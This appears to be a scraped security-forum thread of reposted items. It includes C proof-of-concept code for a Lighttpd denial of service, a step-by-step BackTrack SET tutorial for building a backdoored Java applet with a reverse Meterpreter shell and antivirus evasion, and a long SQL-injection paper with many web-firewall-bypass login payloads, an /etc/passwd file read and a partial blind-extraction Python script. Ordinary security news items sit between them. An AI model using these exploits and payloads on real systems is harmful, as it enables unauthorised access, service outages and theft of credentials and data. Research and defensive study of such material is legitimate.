getopt(argc,argv,"h:d:p:?")) != -1) { switch(opt) { case 'h': r_hostname = strdup(optarg); if ( (h = gethostbyname(r_hostname))==NULL) { printf("Gethostbyname() field!\n"); exit(-1); } break; case 'p': i=atoi(optarg); break; case 'd': remote_dir = strdup(optarg); break; case '?': usage(argv[0]); break; default: usage(argv[0]); break; } } if (!remote_dir || !h) { usage(argv[0]); exit(-1); } servaddr.sin_family = AF_INET; servaddr.sin_port = htons(i); servaddr.sin_addr = *(struct in_addr*)h->h_addr; len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512; if ( (buf = (char *)malloc(len)) == NULL) { printf("malloc() \n"); exit(-1); } memset(buf,0x0,len); if (i != 80) snprintf(buf,len,header_port,remote_dir,r_hostname,i); else snprintf(buf,len,header,remote_dir,r_hostname); for (i=0;i<130;i++) buf[strlen(buf)] = 127+i; buf[strlen(buf)] = '\r'; buf[strlen(buf)] = '\n'; buf[strlen(buf)] = '\r'; buf[strlen(buf)] = '\n'; printf("OK\n\t\t[+] Creating socket... "); if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) { printf("Socket() error!\n"); exit(-1); } printf("OK\n\t\t[+] Connecting to [%s]... ",r_hostname); if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) { printf("Connect() error!\n"); exit(-1); } printf("OK\n\t\t[+] Sending dirty packet... "); // write(1,buf,strlen(buf)); write(sockfd,buf,strlen(buf)); printf("OK\n\n\t\t[+] Check the website!\n\n"); close(sockfd); } int usage(char *arg) { printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n"); printf("\n\tUsage: %s <options>\n\n\t\tOptions:\n",arg); printf("\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n"); exit(0); } Sursa: Lighttpd 1.4.30 / 1.5 Denial Of Service ? Packet Storm

Lynis Auditing Tool 1.3.0 Authored by Michael Boelen | Site rootkit.nl Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes. This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems. Changes: Some tests have been extended and a few new ones have been added to this release. There are also improvements for the screen output and logging. Download: http://packetstormsecurity.org/files/download/108164/lynis-1.3.0.tar.gz

Pentagon approved Android to be used by DoD officials The Pentagon has approved a version of Android running on Dell hardware to be used by DoD officials, along with the BlackBerry. The approval of Android by the DoD is a major setback for Apple's iPhone. The military approval is quite specific. Android can only be used on Dell's hardware running Android 2.2. Dell is now offering Dell Venue which runs on Android 2.2. So, this is the phone which DoD employees can use. The Dell Mobile Security for Android platform has been certified by the Defense Information Systems Agency (DISA) for information assurance and use on defence networks. The Dell Android solution will help the military adapt to today’s operating environment with greater mobility and improved, real-time access to information on the ground. Why the DoD chose Android ? The reason was simple: open source. Starts & Stripes repots, “Android, developed by Google and other companies, is open source software meaning it can be easily configured by uses – including DOD tech whizzes who want to install security measures.” Using Apple's iPhone or iOS by government officials is a risk, especially when used by non-American officials. Apple tracks your movement through the built-in GPS chips. Other features include enhanced password protection such as the ability to lock the device down after multiple unsuccessful password entries. Administrators also can remotely control the peripherals and security policy levels on the device, he said. The government-issue Streak 5 also includes DISA-approved security provided by Good Technology’s Mobility Suite. Although the Streak 5 is no longer available commercially, Dell is supplying it to DOD because the military likes the form factor, Marinho said. However, he added that the same capabilities and service can be delivered to other platforms running on Android. Sursa: Pentagon approved Android to be used by DoD officials | The Hacker News (THN)

Safegroup malwares 12.2011/ - 24.12.2011 11:12 11.2011/ - 30.11.2011 07:16 10.2011/ - 01.11.2011 06:30 09.2011/ - 25.09.2011 12:53 wiry do gier/ - 08.09.2011 05:05 06.2011/ - 08.09.2011 12:36 05.2011/ - 08.09.2011 12:27 04.2011/ - 08.09.2011 12:16 03.2011/ - 08.09.2011 12:06 02.2011/ - 07.09.2011 11:58 01.2011/ - 07.09.2011 11:54 exploits/ - 07.09.2011 11:01 ALL_MAL_URLS/ - 07.09.2011 11:00 08.2011/ - 07.09.2011 10:59 07.2011/ - 07.09.2011 10:53 Link: http://malwares.pl/

[h=2]Nytro: Message to Anonymous - "Muie"[/h]

Unde e provocarea? Asta pare mai mult o tema la informatica.

SecurityXploded Ebook Search Exemplu: [TABLE=width: 98%, align: left] [TR] [TD]Showing 1 to 10 out of 2981 results[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] CCNA_security.pdf Size: 33,214 KB, Download Count: 14,500[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Cisco Press - CCNA Security Packet Tracer Manual.pdf Size: 1,438 KB, Download Count: 7,189[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Network.Security.Bible.Jan.2005.pdf Size: 12,841 KB, Download Count: 7,171[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] CCNA-SECURITY-640.553.pdf Size: 33,214 KB, Download Count: 6,065[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Sybex CompTIA Security+ Studyguide 3rd Ed.pdf Size: 10,876 KB, Download Count: 5,843 [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] CISSP - Certified Information Systems Security Professional Study Guide, Third Edition.pdf Size: 14,566 KB, Download Count: 5,678[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Damodaran On Valuation Security Analysis for investment and corporate finance.PDF Size: 29,802 KB, Download Count: 5,637[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] CCNA Security Quick Reference.pdf Size: 4,087 KB, Download Count: 5,064[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Cryptography and Network Security Forouzan.pdf Size: 50,157 KB, Download Count: 4,301[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Network.Security.Technologies.Second.Edition.pdf Size: 4,478 KB, Download Count: 3,608[/TD] [/TR] [/TABLE] Link: http://securityxploded.com/search-ebooks.php

China Software Developer Network (CSDN) 6 Million user data Leaked Posted by THN Reporter On 12/21/2011 07:33:00 AM The "Chinese Software Developer Network" (CSDN), operated by Bailian Midami Digital Technology Co., Ltd., is one of the biggest networks of software developers in China. A text file with 6 Million CSDN user info including user name, password, emails, all in clear text leaked on internet. The Download Link (use xunlei to download the file) of the File is available on various social Networks. NowChinese programmers are busy changing their password now. Full archive of 104.9 MB (MD5 = b75678048d100600d3a6c648075636a7) available for Download Now : Here Just did some data ming on CSDN leaked user data. Some interesting findings. Here are the results of Top 100 email providers form 6M CSDN user emails : @qq.com, 1976190 @163.com, 1766919 @126.com, 807893 @sina.com, 351590 @yahoo.com.cn, 205487 @hotmail.com, 202944 Security is important, especially for online service. And NEVER store user password in clear texts. Sursa: China Software Developer Network (CSDN) 6 Million user data Leaked | The Hacker News (THN)

[h=1]Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers[/h] December 22nd, 2011, 14:41 GMT · By Eduard Kovacs Medium severity vulnerabilities are found in Kaspersky Anti-Virus and Kaspersky Internet Security 2011/2012 which can allow an attacker to crash the complete software process. Researchers from Vulnerability Laboratory found a flaw caused by an invalid pointer corruption when processing a corrupt .cfg file through the Kaspersky exception filters. The bug seems to be located in basegui.ppl and basegui.dll when a cfg file import is processed. A proof of concept vide was also published along with the disclosure. “The PoC is not affected by the import exception-handling & get through without any problems. A invalid pointer write & read allows a local attacker to crash the software via memory corruption. The technic & software to detect the bug in the binary is prv8,” Benjamin Kunz Mejri, Vulnerability Laboratory founder, wrote. It also seems that a local attacker doesn’t need to know any passwords in order to load the malicious configuration file. According to the timeline report provided by Vulnerability Labs, Kaspersky was notified on the issue in December 2010 and responded a month later. The information on the vulnerabilities was not disclosed until a few days ago, but there is no mention of the bug being fixed. A while back, I had the opportunity to have a chat with Benjamin Kunz Mejri on the security issues they discovered and, at the time, he admitted that not everyone appreciates what they’re doing. “There are 2 options for the product vendor ... he hates us because he cannot see his own flaws/mistakes/fails ... or he loves us because he can now see his flaws/mistakes/fails. Nothing between. The most vendors reply very friendly & ask us for disclosure partnership (cooperation) for future bug publications,” he said. I have contacted Kaspersky to see what they have to say on the matter so stay tuned for an update. Sursa: Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers - Softpedia

[h=1]Untethered jailbreak demonstrated for iOS 5, iOS 5.1[/h] Dec. 22, 2011 (8:25 am) By: Will Shanklin Are you itching for that untethered iOS 5 jailbreak that’s just around the corner? Do you like being teased? If so, you’ll want to check out the video that iOS hacker extraordinaire pod2g has posted. As advertised, it’s a jailbreak and it doesn’t require PC connection after a reboot. The phone in the video is an iPhone 4, not the iPhone 4S. pod2g has also been working on an iOS 5 jailbreak for the A5-running iPad 2 and iPhone 4S, but they’re farther from release. This jailbreak will be for all iOS 5 devices other than those two. That means the iPhone 4, iPhone 3GS, iPod touch 4th generation, and original iPad will be getting in on the untethered action. Most developers hate being pestered for release dates, but pod2g has been generous with progress updates. Last week it sounded like the jailbreak was going through its final days of testing, but he’s had more kinks to work out. He now says that it’s nearly ready for prime time, but also asks for patience, saying that there are “some more days to wait.” An untethered jailbreak for iOS 5 would be a welcomed holiday gift for iOS users. The firmware has been around for a couple of months now. Though it has been jailbreakable from the beginning, it’s a tethered jailbreak, requiring you to connect your device to a PC every time you reboot your device. The untethered jailbreak will remove those chains. As nice as the untethered jailbreak will be, the real prize will be a jailbreak for A5 devices. The iPad 2 and iPhone 4S have thus far proven to be nearly impossible to hack, but pod2g has been making progress on that front too. Last weekend he mentioned that the biggest obstacles were processor cache issues, but he quickly remedied that. The iPhone 4S and iPad 2 jailbreak won’t be release as quickly as the jailbreak in the video, but there’s a good chance pod2g will be releasing it before too long. via pod2g Sursa: Untethered jailbreak demonstrated for iOS 5, iOS 5.1 – Cell Phones & Mobile Device Technology News & Updates | Geek.com

[h=2]Atacuri informatice în 2012: ?inte stabilite, r?zboi cibernetic, amenin??ri mobile [/h]22 12 2011 15:39 Corina Cailean Ce ne va aduce 2012 din punct de vedere al securit??ii informatice? În mare, va trebui s? ne a?tept?m nu doar la o cre?tere extrem? a atacurilor cu ?inte specifice asupra institu?iilor de stat ?i asupra marilor companii, dar este posibil ca din ce în ce mai multe organiza?ii s? fie afectate de incidente informatice. Practic, ?inta principal? a atacatorilor cibernetici o vor constitui guvernele ?i marile corpora?ii din întreaga lume. Pentru noi, ca simpli utilizatori, „c?lcâiul lui Ahile” îl vor constitui telefoanele mobile, sus?in exper?ii Kaspersky Lab, care au realizat un raport de previziuni pentru anul viitor. Alexander Gostev, autorul raportului „Cyberthreat Forecast for 2012”, sus?ine c?, pentru moment, majoritatea incidentelor informatice afecteaz? companiile ?i organiza?iile guvernamentale implicate în fabricarea de armament, opera?iuni financiare sau în activit??i legate de cercetarea în domeniul hi-tech sau în domeniul ?tiin?ei. Anul viitor, vor fi afectate ?i companiile care activeaz? în domenii ca extrac?ia de resurse naturale, energie, transport, alimenta?ie ?i farmaceutice. Din punctul de vedere al utilizatorului „casnic”, e important de re?inut c? printre ?intele predilecte se vor num?ra ?i companiile care furnizeaz? servicii de Internet, precum ?i cele care se ocup? cu securitatea informa?iilor. Atacurile vor fi mai extinse din punct de vedere geografic anul viitor, incluzând Europa Occidental? ?i SUA, ?i vor afecta Europa de Est, Orientul Mijlociu ?i Asia de Sud-Est. Exper?ii Kaspersky Lab prev?d c? infractorii cibernetici î?i vor schimba metodele de atac, pentru a se adapta la competi?ia dintre companiile de securitate IT, ce investigheaz? acest tip de atacuri ?i care ofer? protec?ie împotriva lor. Nivelul crescut de aten?ie la bre?ele de securitate va reprezenta înc? un motiv pentru care atacatorii vor fi nevoi?i s? caute noi instrumente. Metodele conven?ionale de atac, ce implic? ata?amente de e-mail care exploateaz? vulnerabilit??ile din sistem vor deveni din ce în ce mai ineficiente, în timp ce atacurile prin intermediul motoarelor de c?utare (influen?area rezultatelor afi?ate în c?ut?ri online pe anumite subiecte) vor fi mult mai populare. O alt? previziune este legat? de atacurile grupurilor de hackeri activi?ti asupra organiza?iilor de stat ?i companiilor - care vor continua ?i în 2012 ?i vor avea o agend? predominant politic?. Cu toate acestea, „hacktivism-ul” ar putea fi utilizat ca o metod? de divesiune pentru a ascunde alte tipuri de atac. Programele de malware hi-tech, cum sunt Stuxnet ?i Duqu, create cu sprijinul statelor vor r?mâne fenomene unice. Apari?ia lor va fi decis? de tensiunile interna?ionale dintre anumite ??ri, iar conflictele în spa?iul virtual se vor forma în jurul confrunt?rilor tradi?ionale: SUA ?i Israel împotriva Iranului ?i SUA ?i Europa de Vest împotriva Chinei. „Armele” de baz? care sunt construite pentru a distruge date într-un anumit moment, cum sunt „kill switches”, bombe logice etc, vor deveni mai populare deoarece sunt mai u?or de fabricat. Crearea acestor programe poate fi externalizat? c?tre furnizori priva?i utiliza?i de agen?iile militare sau guvernamentale. În multe cazuri, este posibil ca furnizorul s? nu ?tie care sunt scopurile clientului. În ceea ce prive?te amenin??rile pentru telefoane mobile, Kaspersky Lab se a?teapt? ca Google Android s? fie ?inta favorit? pentru pia?a de software periculos, care atac? terminale mobile, precum ?i s? creasc? num?rul de atacuri ce exploateaz? vulnerabilit??i. Este prognozat? ?i apari?ia primelor atacuri mobile de tip drive-by ?i a botnet-urilor mobile. Spionajul mobil se va r?spândi la scar? larg? ?i va include, cel mai probabil, furt de date de pe telefoane mobile ?i urm?rirea anumitor persoane cu ajutorul telefoanelor sau a serviciilor de localizare geografic?. Sursa: Atacuri informatice în 2012: ?inte stabilite, r?zboi cibernetic, amenin??ri mobile PS: E scris de o femeie, nu l-am citit, dar cam asta se propaga prin media.

[h=1]phpMyAdmin 3.4.9 fixes XSS vulnerabilities[/h]22 December 2011, 12:10 Version 3.4.9 of phpMyAdmin has been released, closing two security holes in the open source database administration tool. The update fixes vulnerabilities in the phpMyAdmin setup interface and the export panels in the server, database and table sections that could be exploited for cross-site scripting (XSS) attacks. All 3.4.x versions up to and including 3.4.8 are affected – upgrading to 3.4.9 corrects the issues. Alternatively, patches are provided. The new release also fixes nine other bugs related to navigation, the user interface and the edit functionality. A full list of changes can be found in the release notes and in the project's security advisories. Version 3.4.9 of phpMyAdmin is available to download from the project's site. Hosted on SourceForge, phpMyAdmin source code is licensed under the GPLv2. See also: XSS in export, a phpMyAdmin security advisory. XSS in setup, a phpMyAdmin security advisory. (crve) Sursa: phpMyAdmin 3.4.9 fixes XSS vulnerabilities - The H Open Source: News and Features

Hardware Involved Software Attacks Jeff Forristal jeff.forristal_@_intel.com Abstract Computer security vulnerabilities involving hardware are under-represented within the security industry. With a growing number of attackers, malware, and researchers moving beyond pure software attack scenarios and into scenarios incorporating a hardware element, it is important to start laying a foundation on how to understand, characterize, and defend against these types of hybrid attacks. This paper introduces and details a starting taxonomy of security attacks called hardware involved software attacks, in an effort to further security community awareness of hardware security and its role in upholding the security of the PC platform. Table of Contents Preface ......................................................................................................................................................... 3 PC System Stack: Setting the Stage ............................................................................................................... 3 Focus on the Hardware Layer ................................................................................................................... 5 Forced Migration Down the Stack ............................................................................................................ 6 Hardware Background ................................................................................................................................. 7 How Hardware Facilitates Security Attacks .............................................................................................. 8 Obtaining Hardware Access ...................................................................................................................... 8 Taxonomy of Hardware Involved Software Attacks ..................................................................................... 9 Inappropriate General Access to Hardware............................................................................................ 10 Unexpected Consequences of Specific Hardware Function ................................................................... 11 Hardware Reflected Injection ................................................................................................................. 11 Interference with Hardware Privilege Access Enforcement ................................................................... 13 Access By a Parallel Executing Entity ...................................................................................................... 13 External Control of a Hardware Device .................................................................................................. 14 Incorrect Hardware Use .......................................................................................................................... 14 Where to Go From Here ............................................................................................................................. 15 Appendix A – Publicized Hardware Vulnerabilities ..................................................................................... 15 CVE List of Hardware Involved Software Vulnerabilities ........................................................................ 16 Download: http://www.forristal.com/material/Forristal_Hardware_Involved_Software_Attacks.pdf

[h=2]Backtrack 5: Penetration Testing with Social Engineering Toolkit[/h] Social engineering attacks are one of the top techniques used against networks today. Why spend days, weeks or even months trying to penetrate layers of network security when you can just trick a user into running a file that allows you full access to their machine and bypasses anti-virus, firewalls and many intrusion detection systems? This is most commonly used in phishing attacks today -craft an e-mail, or create a fake website that tricks users into running a malicious file that creates a backdoor into their system. But as a security expert, how could you test this against your network? Would such an attack work, and how could you defend against it? The Backtrack Linux penetration testing platform includes one of the most popular social engineering attack toolkits available. My previous “How-To” on Backtrack 4?s SET has been extremely popular. Well, Backtrack 5?s SET includes a whole slew of new features and I figured it was time to update the tutorial. We will use SET to create a fake website that offers a backdoored program to any system that connects. So here goes… Okay, timeout for a disclaimer: This is for security testing purposes only, never attempt to use any security checks or tools on a network that you do not have the authorization and written permission to do so. Doing so could cost you your job and you could end up in jail. 1. Obtain Backtrack 5 release 1. You can use the LiveCD version, install it on a new system or run it in a Virtual Machine. 2. The first thing you will want to do is update both the Metasploit Framework and the Social Engineering Toolkit to make sure you have the latest version. Update both, restart SET and check updates one more time. 3. Select number 1, “Social Engineering Attacks” 4. Next select 2, “Website Attack Vectors”. Notice the other options available. 5. Then 1, “Java Applet Attack Method”. This will create a Java app that has a backdoor shell in it. 6. Next choose 1, “Web Templates” to have SET create a generic webpage to use. Option 2, “Site Cloner” allows SET to use an existing webpage as a template for the attack webpage. 7. Now choose 1, “Java Required”. Notice the other social media options available. 8. Pick a payload you want delivered, I usually choose 2, “Windows Reverse_TCP Meterpreter”, but you have several to choose from including your own program . Number 13, “ShellCodeExec Alphanum Shellcode” is interesting as it runs from memory, never touching the hard drive, thus effectively by-passing most anti-virus programs. 9. Next choose an encoding type to bypass anti-virus. “Shikata_ga_nai” is very popular, Multi-Encoder uses several encoders, but number 16 is best, “Backdoored Executable”. It adds the backdoor program to a legitimate program, like Calc.exe. 10. Set the port to listen on, I just took the default. Now Backtrack is all set and does several things. It creates the backdoor program, encodes and packs it. Creates the website that you want to use and starts up a listening service looking for people to connect. When done, your screen will look like this: Okay we are all set. Now if we go to a “Victim” machine and surf to the IP address of the “attacker” machine we will see this: If the “Victim” allows this Java script to run, we get a remote session on our attacking machine: You now have access to the victims PC. Use “Sessions -i” and the Session number to connect to the session. Once connected, you can use linux commands to browse the remote PC, or running “shell” will give you a remote windows command shell. That’s it, one bad choice on the victim’s side and security updates and anti-virus means nothing. The “Victim” in this case was a fully updated Windows XP Professional with the top name anti-virus internet security suite installed and updated. They can even surf away or close the webpage, because once the shell has connected the web browser is no longer needed. Most attackers will then solidify their hold on the PC and merge the session into another process effectively making the shell disappear. This is why informing your users about the dangers of clicking on unknown links in e-mails, suspicious web links, online anti-virus messages and video codec updates is critical. It can be very hazardous to your network. The easiest way to stop this type of attack is to simply run the FireFox add-in “Noscript”, also BitDefender AV 2012 seems very, very resilient against these types of attacks. Sursa: https://cyberarms.wordpress.com/2011/12/22/backtrack-5-penetration-testing-with-social-engineering-toolkit/

Armitage Hacking Made Easy Part 1 Author : r45c4l Mail : infosecpirate@gmail.com Twitter Greetz and shouts to the entire ICW team and every Indian hackers Introduction When I started writing this, I thought to keep it short and simple as I am assuming that the readers are atleast a little bit familiar hey Metasploit as well as Armitage. They don't need to know everything, but atleast have an idea about the use and purpose of these tools. When I started writing this, I realized that it's really not possible to cover the vast amount of features and the usability of this tool, so I decided to continue this paper in series. I hope to finish this in part 2 of this paper but again it depends on the demands and requests of the readers if they want to add or go into the detail of any of the topic or functions of this beautiful tool “Armitage”. There must be some mistakes so I request readers to please let me know about those mistakes so that I can correct them and give them a better stuff. My contact details are mentioned above. Download: http://www.exploit-db.com/download_pdf/18255

[h=1]False SQL Injection and Advanced Blind SQL Injection[/h] ######################################################################### # # # Exploit Title: False SQL injection and advanced blind SQL injection # # Date: 21/12/2011 # # Author: wh1ant # # Company: trinitysoft # # Group: secuholic # # # # ### ## # # ###### ###### # # ## ## ### ## # # ## ## # # ### ### # # ### ### # # ### # # ### # # ############ ########### # # ############################ # # ############################## # # ############################# # # # ############################ # # # # #### ############ #### # # # # ##### ########## ##### # # # # ###################### ## # # ## #################### ## # # ## ################## ## # # # ## ################ ## # # # # ## ############## ## # # # ## ## ############ ## ## # # ## ## ########## ## ## # # # ## ######## ## # # # ## ###### ## # # ## #### ## # # ## ## ## # # ## ## # # ## ## # # ### ### # # # ######################################################################### This document is written for publicizing of new SQL injection method about detour some web firewall or some security solution. I did test on a web firewall made in Korean, most SQL injection attack was hit, I will not reveal the maker for cutting its damage. In order to read this document, you have to understand basic MySQL principles. I classified the term "SQL Injection" as 2 meanings. The first is a general SQL Injection, we usually call this "True SQL Injection", and the second is a "False SQL Injection". Though in this documentation, you can know something special about "True SQL Injection" And I mean to say it's true that my method (False SQL Injection) is different from True/False SQL Injection mentioned in "Blind SQL Injection". A tested environment was as follow. ubuntu server 11.04 mysql 5.1.54-1 Apache 2.2.17 PHP 5.3.5-1 A tested code was as follow. <?php /* create database injection_db; use injection_db; create table users(num int not null, id varchar(30) not null, password varchar(30) not null, primary key(num)); insert into users values(1, 'admin', 'ad1234'); insert into users values(2, 'wh1ant', 'wh1234'); insert into users values(3, 'secuholic', 'se1234'); *** login.php *** */ if(empty($_GET['id']) || empty($_GET['password'])){ echo "<html>"; echo "<body>"; echo "<form name='text' action='login.php' method='get'>"; echo "<h4>ID <input type='text' name='id'><br>"; echo "PASS<input type='password' name='password'><br></h4>"; echo "<input type='submit' value='Login'>"; echo "</form>"; echo "</body>"; echo "</html>"; } else{ $id = $_GET['id']; $password = $_GET['password']; $dbhost = 'localhost'; $dbuser = 'root'; $dbpass = 'pass'; $database = 'injection_db'; $db = mysql_connect($dbhost, $dbuser, $dbpass); mysql_select_db($database,$db); $sql = mysql_query("select * from users where id='$id' and password='$password'") or die (mysql_error()); $row = mysql_fetch_array($sql); if($row[id] && $row[password]){ echo "<font color=#FF0000><h1>"."Login sucess"."</h1></u><br>"; echo "<h3><font color=#000000>"."Hello, "."</u>"; echo "<font color=#D2691E>".$row[id]."</u></h3><br>"; } else{ echo "<script>alert('Login failed');</script>"; } mysql_close($db); } ?> First, basic SQL Injection is as follow. ' or 1=1# The code above is general SQL Injection Code, and this writer classified the code as "True SQL Injection". When you log on to some site, in internal of web program, your id and password are identified by some statement used "select id, password from table where id='' and password='', you can easily understand when you think 0 about character single quotation mark. Empty space is same as 0, the attack is possible using = and 0. As a result, following statement enables log on process. '=0# We can apply it in a different way. This is possible as 0>-1 '>-1# Also, this is possible as 0<1 '<1# You don't have to use only single figures. You can use two figures attack as follow. 1'<99# Comparison operation 0=1 will be 0, the following operation result is true because of id=''=0(0=1). '=0=1# Additionally there is some possible comparison operation making the same value each other. '<=>0# Like this, if you use the comparison operation, you can attack as additional manner. '=0=1=1=1=1=1# '=1<>1# '<>1# 1'<>99999# '!=2!=3!=4# In this time, you get the turn on understanding False SQL injection. the following is not attack but operation for MySQL. mysql> select * from users; +-----+-----------+----------+ | num | id | password | +-----+-----------+----------+ | 1 | admin | ad1234 | | 2 | wh1ant | wh1234 | | 3 | secuholic | se1234 | +-----+-----------+----------+ 3 rows in set (0.01 sec) This shows the contents in any table without any problem. The following is the content when you don't input any value in the id mysql> select * from users where id=''; Empty set (0.00 sec) Of course there is not result because id field dosen't have any string. In the truth, I have seen the case that in the MySQL if string field has a 0, the result is true. Based on the truth, following statement is true. mysql> select * from users where id=0; +-----+-----------+----------+ | num | id | password | +-----+-----------+----------+ | 1 | admin | ad1234 | | 2 | wh1ant | wh1234 | | 3 | secuholic | se1234 | +-----+-----------+----------+ 3 rows in set (0.00 sec) If you input 0 in id, All the content is showed. This is the basic about "False SQL Injection". After all, result of 0 makes log on process success. For making the result 0, you need something processing integer, in that time you can use bitwise operations and arithmetic operations. Once I'll show bitwise operation example. Or bitwise operation is well known for any programmer. And as I told you before, '' is 0, if you operate "0 bitwise OR 0", the result is 0. So the following operation succeed log on as the False SQL Injection. '|0# Naturally, you can use AND operation. '&0# This is the attack using XOR '^0# Also using shift operation is enable. '<<0# '>>0# If you apply like those bitwise operations, you can use variable attack methods. '&''# '%11&1# '&1&1# '|0&1# '<<0|0# '<<0>>0# In this time, I will show "False SQL Injection" using arithmetic operations. If the result is 0 using arithmetic operation with '', attack will be success. The following is the example using arithmetic operation. '*9# Multiplication '/9# Division. '%9# Mod '+0# Addition '-0# Subtraction Significant point is that the result has to be under one. Also you can attack as follow. '+2+5-7# '+0+0-0# '-0-0-0-0-0# '*9*8*7*6*5# '/2/3/4# '%12%34%56%78# '/**/+/**/0# '-----0# '+++0+++++0*0# Next attack is it using fucntion. In this document, I can't show all the functions. Because this attack is not difficult, you can use the "True, False SQL Injection" attack with function as much as you want. And whether this attack is "True SQL Injection" or "False SQL Injection" is decided on the last operation after return of function. '<hex(1)# '=left(0x30,1)# '=right(0,1)# '!=curdate()# '-reverse(0)# '=ltrim(0)# '<abs(1)# '*round(1,1)# '&left(0,0)# '*round(0,1)*round(0,1)# Also, you can use attack using space in function name. But you are able to use the space with only some function. '=upper (0)# In this time, SQL keyword is method. This method is also decided as True or False Injection according to case. ' <1 and 1# 'xor 1# 'div 1# 'is not null# admin' order by' admin' group by' 'like 0# 'between 1 and 1# 'regexp 1# Inputting id or password in the field without annotaion is possible about True, False SQL Injection. Normal Web Firewalls filter #, --, /**/, so the method is more effective in the Web Firewalls. ID : '=' PASS: '=' ID : '<>'1 PASS: '<>'1 ID : '>1=' PASS: '>1=' ID : 0'='0 PASS: 0'='0 ID : '<1 and 1>' PASS: '<1 and 1>' ID : '<>ifnull(1,2)='1 PASS: '<>ifnull(1,2)='1 ID : '=round(0,1)='1 PASS: '=round(0,1)='1 ID : '*0*' PASS: '*0*' ID : '+' PASS: '+' ID : '-' PASS: '-' ID :'+1-1-' PASS:'+1-1-' All attacks used in the documentation will be more effective with using bracket when detouring web firewall. '+(0-0)# '=0<>((reverse(1))-(reverse(1)))# '<(8*7)*(6*5)*(4*3)# '&(1+1)-2# '>(0-100)# Let's see normal SQL Injection attack. ' or 1=1# If this is translated in hexdemical, the result is as follow. http://127.0.0.1/login.php?id=%27%20%6f%72%20%31%3d%31%23&password=1234 Like attack above is basically filtered. So that's not good attack, I will try detour filtering using tab(%09) standing in for space(%20). In truth, you can use %a0 on behalf of %09. The possible values are as follow. %09 %0a %0b %0c %0d %a0 %23%0a %23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a The following is the example using %a0 instead of %20. http://127.0.0.1/login.php?id=%27%a0%6f%72%a0%31%3d%31%23&password=1234 In this time, I will show "Blind SQL injection" attack, this attack can't detour web firewall filtering, but some attacker tend to think that Blind SQL Injection attack is impossible to log on page. So I decided showing this subject. The following attack code can be used on log on page. And the page will show id and password. 'union select 1,group_concat(password),3 from users# This attack code brings /etc/password information. 'union select 1,load_file(0x2f6574632f706173737764),3 from users# Dare I say it without union select statement using Blind SQL injection with and operation is possible. The result of record are three. admin' and (select count(*) from users)=3# Let's attack detouring web firewall using Blind SQL Injection. The following is vulnerable code to Blind SQL Injection. <?php /*** info.php ***/ $n = $_GET['num']; if(empty($n)){ $n = 1; } $dbhost = 'localhost'; $dbuser = 'root'; $dbpass = 'root'; $database = 'injection_db'; $db = mysql_connect($host, $dbuser, $dbpass); mysql_select_db($database,$db); $sql = mysql_query("select * from `users` where num=".$n) or die (mysql_error()); $info = @mysql_fetch_row($sql); echo "<body bgcolor=#000000>"; echo "<h1><font color=#FFFFFF>wh1ant</font>"; echo "<font color=#2BF70E> site for blind SQL injection test</h1><br>"; echo "<h1><font color=#2BF70E>num: </font><font color=#D2691E>".$info[0]."</font></h1>"; echo "<h1><font color=#2BF70E>user: </font><font color=#D2691E>".$info[1]."</font>"; echo "<body>"; mysql_close($db); ?> Basic Blind SQL Injection is as follow on like above. http://127.0.0.1/info.php?num=1 and 1=0 http://127.0.0.1/info.php?num=1 and 1=1 But using = operation is possible for Blind SQL Injection. http://192.168.137.129/info.php?num=1=0 http://192.168.137.129/info.php?num=1=1 Also other operation is possible naturally. http://127.0.0.1/info.php?num=1<>0 http://127.0.0.1/info.php?num=1<>1 http://127.0.0.1/info.php?num=1<0 http://127.0.0.1/info.php?num=1<1 http://127.0.0.1/info.php?num=1*0*0*1 http://127.0.0.1/info.php?num=1*0*0*0 http://127.0.0.1/info.php?num=1%1%1%0 http://127.0.0.1/info.php?num=1%1%1%1 http://127.0.0.1/info.php?num=1 div 0 http://127.0.0.1/info.php?num=1 div 1 http://127.0.0.1/info.php?num=1 regexp 0 http://127.0.0.1/info.php?num=1 regexp 1 http://127.0.0.1/info.php?num=1^0 http://127.0.0.1/info.php?num=1^1 Attack example: http://127.0.0.1/info.php?num=0^(locate(0x61,(select id from users where num=1),1)=1) http://127.0.0.1/info.php?num=0^(select position(0x61 in (select id from users where num=1))=1) http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e) http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e) http://127.0.0.1/info.php?num=0^((select id from users where num=1)=0x61646d696e) http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e) http://127.0.0.1/info.php?num=0^(id=0x61646d696e) http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5) http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5) If I will show all attack, I have to take much time, So I stopped in this time. Blind SQL Injection is difficult manually, So using tool will be more effective. I will show a tool made python, this is an example using ^(XOR) bitwise operation. In order to make the most of detouring the web firewall, I replaced space with %0a. #!/usr/bin/python ### blind.py ### import urllib import sys import os def put_data(true_url, true_result, field, index, length): for i in range(1, length+1): for j in range(32, 127): attack_url = true_url + "^(%%a0locate%%a0%%a0(0x%x,(%%a0select%%a0%s%%a0%%a0from%%a0%%a0users%%a0where%%a0num=%d),%d)=%d)" % 